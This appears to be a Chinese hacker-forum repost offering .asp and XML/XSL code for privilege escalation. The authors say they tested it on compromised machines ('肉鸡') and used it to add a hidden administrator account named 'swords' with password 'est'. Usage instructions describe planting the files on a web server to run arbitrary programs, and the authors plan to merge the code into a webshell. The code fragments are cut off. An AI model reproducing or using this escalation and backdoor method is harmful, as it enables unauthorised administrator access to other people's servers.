添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]作者：蓝屏,凯文 文章来源：冰点极限其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```反正代码是对的，但是很少能成功，具体的看运气了。。呵呵，下一步我想把他整合到海洋里面去。嘿嘿。 [code]<head>.network对象脚本权限提升漏洞...

用法：把swords.xml和swords.xsl放在一个普通空间，相信很少人会注意xml的安全性吧，嘎嘎，只要把你想运行的程序添加到run()即可，默认支持js和vbs.这个程序加了一个用户为swords，密码为est的超级管理员账号。swords.xml<?xmlversion="1.0"encoding="GB2312"?><?xml-stylesheettype="text/xsl"href="swords.xsl"?><name>Iamswords,Iamadmin!</name>swords.xsl<?xmlversion="1...